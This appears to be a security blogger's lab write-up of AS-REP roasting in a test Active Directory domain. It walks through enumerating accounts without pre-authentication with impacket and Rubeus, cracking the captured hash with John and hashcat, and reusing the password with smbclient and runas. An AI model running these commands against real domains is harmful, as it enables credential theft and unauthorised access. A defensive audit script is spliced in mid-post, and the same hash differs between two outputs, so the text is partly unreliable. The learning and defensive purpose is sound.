In this post, I'm learning about Kerberos and one of its attacks. Specifically, I'm learning about Authentication Service Response (AS-REP) Roasting. Based on my learning, this is an attack that should be highly unlikely today, as by default in Active Directory the feature that enables this attack is more likely to be disabled. I am, as always, doing this from the perspective of enhancing my learning. In this post, I learned more about Kerberoasting.

First up, here is what a normal Active Directory Kerberos authentication looks like within the first 4 packets.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    8  10.244059   10.0.0.108 → 10.0.0.5     KRB5 311 AS-REQ
    9  10.248297     10.0.0.5 → 10.0.0.108   KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED
   16  10.259148   10.0.0.108 → 10.0.0.5     KRB5 391 AS-REQ
   17  10.261119     10.0.0.5 → 10.0.0.108   KRB5 2131 AS-REP
  153  28.562552   10.0.0.108 → 10.0.0.5     KRB5 294 AS-REQ

As shown in packet 8, the client makes a request.
In packet 9, the server responds with a KRB ERROR, stating that pre-authentication is required. Without this pre-authentication requirement, someone would be able to request a Ticket Granting Ticket (TGT) for those users who do not have this feature enabled and then crack the user's password. Once you have the cracked password, you can authenticate as that user.

Looking at this in practice, from an Active Directory perspective, the user would have to deliberately disable the pre-authentication as shown below.

Let's now leverage a tool from the Impacket suite to see which accounts have pre-authentication disabled. Say we have access to a low-privilege account that is just a member of Domain Users; we can use that account with impacket-GetNPUsers to learn about users with pre-authentication disabled.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 

Now that we know a user has the pre-authentication check disabled, let's request a ticket on this user's behalf. At the same time, I will output the contents to a file and provide that file to John to crack.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 
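The UAC column impacket printed (0x410200) is just a bit field, and the bit that makes neysa AS-REP roastable is DONT_REQ_PREAUTH (0x400000); the rest is NORMAL_ACCOUNT (0x200) and DONT_EXPIRE_PASSWORD (0x10000). As an added example, not from the original post, the following decodes that value, reports which accounts in a constructed list are roastable (pre-auth disabled and the account itself not disabled), and produces the LDAP bit-match filter an administrator can run to find such accounts without any attack tooling. neysa's value is the one shown above; the other accounts and their values are hypothetical.

```python
# userAccountControl bit flags (subset; values from the Active Directory schema).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def to_int(value):
    """Accept the "0x410200" string impacket prints, a decimal string, or an int."""
    return int(value, 0) if isinstance(value, str) else int(value)


def decode_uac(value):
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    value = to_int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(value):
    """Pre-authentication not required on an account that is still enabled."""
    value = to_int(value)
    return bool(value & DONT_REQ_PREAUTH) and not (value & ACCOUNTDISABLE)


def ldap_filter_preauth_disabled():
    """LDAP filter (bitwise AND matching rule) listing enabled users with DONT_REQ_PREAUTH set."""
    return (f"(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH})"
            f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={ACCOUNTDISABLE})))")


# Constructed sample: neysa's value is the one impacket printed; the rest are hypothetical.
SAMPLE_ACCOUNTS = {
    "neysa": "0x410200",     # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    "nakia": "0x10200",      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "old-svc": "0x400202",   # pre-auth off, but the account is disabled
    "DC-2019$": "0x82000",   # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
}


def audit(accounts):
    return {name: {"flags": decode_uac(uac), "asrep_roastable": asrep_roastable(uac)}
            for name, uac in accounts.items()}


if __name__ == "__main__":
    for name, result in audit(SAMPLE_ACCOUNTS).items():
        marker = "ROASTABLE" if result["asrep_roastable"] else "ok"
        print(f"{name:10} {marker:10} {', '.join(result['flags'])}")
    print(ldap_filter_preauth_disabled())
```

The filter string can be pasted into ldapsearch or a PowerShell Get-ADUser -LDAPFilter call; the remediation is simply clearing the "Do not require Kerberos preauthentication" checkbox the post shows being set, after which the KDC answers with KRB5KDC_ERR_PREAUTH_REQUIRED as in the first capture.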

When we cat the file, we see ...

┌──(root💀securitynik)-[~]
└─# cat no-preauth.john 
$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b

We can now provide the file to John, with our wordlist. 

Before giving the hash to John, what did the request look like on the wire?

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    4   0.000441   10.0.0.107 → 10.0.0.5     KRB5 246 AS-REQ
    5   0.002625     10.0.0.5 → 10.0.0.107   KRB5 2376 AS-REP

As seen above, there is no pre-authentication error message in this capture, unlike in the first capture.

Feeding the file to John.

┌──(root💀securitynik)-[~]
└─# john --format=krb5asrep no-preauth.john  --wordlist=~/SEC-504/pass.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates left, minimum 16 needed for performance.
Testing1         ($krb5asrep$neysa@SECURITYNIK.LOCAL)
1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Voila, now we have the user's username and password and can reuse them to gain access. Let's try listing the shares on the remote machine using smbclient.

┌──(root💀securitynik)-[~/packets]
└─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Leveraging Rubeus for AS-REP Roasting

Now that I understand how to use Impacket for this, time to look at another tool, Rubeus.

C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: AS-REP roasting

[*] Target Domain          : securitynik.local
[*] Target DC              : dc-2019.securitynik.local

[*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users
[*] SamAccountName         : neysa
[*] DistinguishedName      : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] Using domain controller: dc-2019.securitynik.local (10.0.0.5)
[*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Tools\asrep-roast.hashes

[*] Roasted hashes written to : C:\Tools\asrep-roast.hashes

Looking at the contents of the file.

C:\Tools> type asrep-roast.hashes
$krb5asrep$23$neysa@securitynik.local:4F4D040B3DFFBEEAC4761AA7B5F62C11$39EFEBF767A19822771789E8AA0286ACA05383F57F421D12C7D2F12E285F6E4386A3C102C3B252B120B07DE1736B80D27098907D1122C45FA79E2CF48843D16E8F96D2E1F59DFAE340610B2F1EF193D634E5954A83CF340CB003AD4EED34B84DEAF1170750C59C8371DECB21949A61A97D8FD66153527F7322AB5BD54F7285EDAF14BCF6B20C4C6E2480EC859DB8C3D784D7BCC8559FAF6A2DE7C20DAD89FD54CF65ABAC8EA92FFB4F313691DDF7EA3255486092845C3CBEB2B55B569BA5923AAFB15B01379B9C919E43F9F0F321AABFFBD16D53F877A650D65ECA2B56741C5D17BCC73DD69A495AFC94ADF77578629CC9C95750002C

Passing the file to Hashcat, we see the password at the end of the line below.

D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt
hashcat (v6.2.4) starting
...

$krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1

As before, now that we have the password, we can authenticate.

C:\Tools>runas /user:securitynik\neysa cmd.exe
Enter the password for securitynik\neysa:
Attempting to start cmd.exe as user "securitynik\neysa" ...

Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.
